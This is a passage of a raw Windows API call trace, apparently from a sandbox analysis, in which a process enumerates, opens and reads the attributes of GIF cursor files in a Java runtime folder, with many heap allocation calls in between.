HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0097.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.116] AreFileApisANSI () returned 1 [0097.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif", lpUsedDefaultChar=0x0) returned 80 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0097.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.116] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.116] AreFileApisANSI () returned 1 [0097.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0097.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8ced8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 80 [0097.117] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.117] GetFileType (hFile=0x33c) returned 0x1 [0097.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0097.117] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.117] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.117] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.118] CloseHandle (hObject=0x33c) returned 1 [0097.118] AreFileApisANSI () returned 1 [0097.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0097.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c8f0, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 80 [0097.118] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.118] GetFileType (hFile=0x33c) returned 0x1 [0097.118] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0097.118] CloseHandle (hObject=0x33c) returned 1 [0097.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.118] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.119] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.119] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.120] AreFileApisANSI () returned 1 [0097.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cc38 [0097.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8cc38, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif") returned 80 [0097.120] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_linknodrop32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99)) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0097.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.120] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.120] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x93, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="win32_MoveDrop32x32.gif", cAlternateFileName="WI06CF~1.GIF")) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.120] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0097.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0097.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0097.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0097.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0097.121] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.121] AreFileApisANSI () returned 1 [0097.121] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif", lpUsedDefaultChar=0x0) returned 78 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0097.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.121] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.121] AreFileApisANSI () returned 1 [0097.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.121] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c650 [0097.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8c650, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 78 [0097.121] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.123] GetFileType (hFile=0x33c) returned 0x1 [0097.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0097.123] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.123] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.123] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.123] CloseHandle (hObject=0x33c) returned 1 [0097.123] AreFileApisANSI () returned 1 [0097.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cd88 [0097.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8cd88, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 78 [0097.124] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.124] GetFileType (hFile=0x33c) returned 0x1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0097.124] CloseHandle (hObject=0x33c) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.244] AreFileApisANSI () returned 1 [0097.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c7a0 [0097.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 78 [0097.245] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x93)) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0097.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.245] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="win32_MoveNoDrop32x32.gif", cAlternateFileName="WIE2D6~1.GIF")) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68e50 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68e50 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x20000, 